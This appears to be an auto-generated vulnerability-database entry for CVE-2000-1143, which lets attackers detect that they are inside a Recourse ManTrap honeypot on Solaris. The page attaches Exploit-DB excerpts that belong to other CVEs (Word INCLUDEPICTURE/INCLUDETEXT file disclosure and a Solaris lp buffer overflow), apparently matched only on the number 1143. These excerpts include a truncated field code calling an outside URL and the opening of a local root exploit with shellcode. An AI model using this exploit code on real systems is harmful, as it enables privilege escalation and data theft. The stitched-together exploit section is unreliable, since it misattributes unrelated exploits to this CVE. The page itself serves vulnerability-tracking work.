CVE-2000-1143
published 2001-01-09CVE-2000-1143: Recourse ManTrap 1.6 hides the first 4 processes that run on a Solaris system, which allows attackers to determine that they are in a honeypot system.
PriorityP44low2.1CVSS 2.0
AVLACLAuNCPINAN
EPSS
0.48%
38.1th percentile
Recourse ManTrap 1.6 hides the first 4 processes that run on a Solaris system, which allows attackers to determine that they are in a honeypot system.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| recourse_technologies | mantrap | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure
exploitdb·2002-09-20
CVE-2002-1143 Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure
Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure
---
source: https://www.securityfocus.com/bid/5764/info
The INCLUDEPICTURE Field Code may be used to insert arbitrary URLs into a document. The INCLUDEPICTURE Field Code is reported to, under some circumstances, present a security threat.
If the INCLUDEPICTURE Field Code is included in a document and references a URL, it may be possible for the attacker to obtain contents of files on the victim user's system. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.
An attacker can potentially exploit this vulnerability to obtain the contents of files residing on a victim user's system.
{ INCLUDEPICTURE { QUOTE "http:\\www.alic
Exploit-DB
Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure
exploitdb·2002-08-26
CVE-2002-1143 Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure
Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure
---
source: https://www.securityfocus.com/bid/5586/info
The Microsoft Word and Excel INCLUDETEXT Field Code may be used to insert an arbitrary local file into a document. The INCLUDETEXT Field Code is reported to, under some circumstances, present a security threat.
If the INCLUDETEXT Field Code is included in a document and references a file on the local system of the recipient, then the file will also be included when the document is sent out. It is possible for an attacker to abuse this functionality in a situation where documents are constantly being shared and updated.
The recipient of the malicious document must still pass along the updated version of the document for the attacker to re
Exploit-DB
Solaris 2.6/7.0 - lp -d Option Buffer Overflow
exploitdb·2000-04-24
CVE-2000-0316 Solaris 2.6/7.0 - lp -d Option Buffer Overflow
Solaris 2.6/7.0 - lp -d Option Buffer Overflow
---
// source: https://www.securityfocus.com/bid/1143/info
A buffer overrun has been discovered in the lp program, as included with Sun's Solaris 7 operating system. By passing well crafted, machine executable code of sufficient length to the -d option of lp, it becomes possible to execute arbitrary code as root.
/*
*
* solaris 2.7 /usr/bin/lp local exploit, i386.
*
* discovered by DiGiT.
* try offset 150-250 if sploit fails
*
* greets: #!ADM, #!security.is, #hax, duke
*
* DiGiT - [email protected]
*
*/
#include
#include
char shellcode[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-11/0041.htmlhttp://archives.neohapsis.com/archives/bugtraq/2000-11/0100.htmlhttp://marc.info/?l=bugtraq&m=97349791405580&w=2https://exchange.xforce.ibmcloud.com/vulnerabilities/5473http://archives.neohapsis.com/archives/bugtraq/2000-11/0041.htmlhttp://archives.neohapsis.com/archives/bugtraq/2000-11/0100.htmlhttp://marc.info/?l=bugtraq&m=97349791405580&w=2https://exchange.xforce.ibmcloud.com/vulnerabilities/5473
2001-01-09
Published